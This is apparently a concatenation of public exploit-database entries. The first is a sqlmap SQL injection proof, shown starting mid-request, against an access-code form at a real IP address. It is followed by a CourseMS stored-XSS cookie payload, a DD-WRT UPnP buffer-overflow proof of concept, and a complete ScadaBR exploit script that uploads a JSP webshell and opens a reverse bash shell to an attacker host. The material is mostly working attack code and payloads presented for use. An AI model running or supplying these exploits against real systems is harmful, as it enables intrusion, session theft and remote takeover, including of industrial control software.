Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout
Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1
Upgrade-Insecure-Requests: 1
txtaccesscode=111&btnsubmit=Submit
Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode
Output
----------------snip----------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtaccesscode (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit
---
[16:29:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: http://sourceforge.net/projects/coursems
# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
# Version: 2.1
# Tested on: Ubuntu 20.04
POST /coursems/admin/add_jobs.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/coursems/admin/add_jobs.php
Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Upgrade-Insecure-Requests: 1
name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC)
# Date: 24.03.2021
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://dd-wrt.com/
# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
# Version: 45723 or prior
# Tested on: TP-Link Archer C7
# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
import socket
target_ip = "192.168.2.1" # IP Address of Target
off = "D"*164
ret_addr = "AAAA"
payload = off + ret_addr
packet = \
'M-SEARCH * HTTP/1.1\r\n' \
'HOST:239.255.255.250:1900\r\n' \
'ST:uuid:'+payload+'\r\n' \
'MX:2\r\n' \
'MAN:"ssdp:discover"\r\n' \
'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.sendto(packet, (target_ip, 1900) )
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
# Date: 04/21
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Debian9,10~Ubuntu16.04
#!/usr/bin/python
import requests,sys,time
if len(sys.argv) <=6:
print('[x] Missing arguments ... ')
print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
sys.exit(0)
else:
time.sleep(1)
host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passw = sys.argv[4]
rev_host = sys.argv[5]
rev_port = sys.argv[6]
flag = False
LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
def main():
payload = {
'username': user,
'password': passw
}
print(banner)
time.sleep(2)
with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)
print "[+] Trying to authenticate "+LOGIN+"..."
if response.status_code == 200:
print "[+] Successfully authenticated! :D~\n"
time.sleep(2)
else:
print "[x] Authentication failed :("
sys.exit(0)
burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print('[>] Attempting to upload .jsp Webshell...')
time.sleep(1)
print('[>] Verifying shell upload...\n')
time.sleep(2)
if getdata.status_code == 200:
print('[+] Upload Successfuly! \n')
for num in range(1,1000):
PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
find = s.get(PATH)
if find.status_code == 200:
print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
print('[>] Spawning Reverse Shell...\n')
time.sleep(3)
burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
time.sleep(5)
if len(r.text) > 401:
print('[+] Connection received')
sys.exit(0)
else:
print('[x] Failed to receive reverse connection ...\n')
elif num == 999:
print('[x] Failed to found Webshell ... ')
else:
print('Reason:'+getdata.reason+' ')
print('Exploit Failed x_x')
if __name__ == '__main__':
main()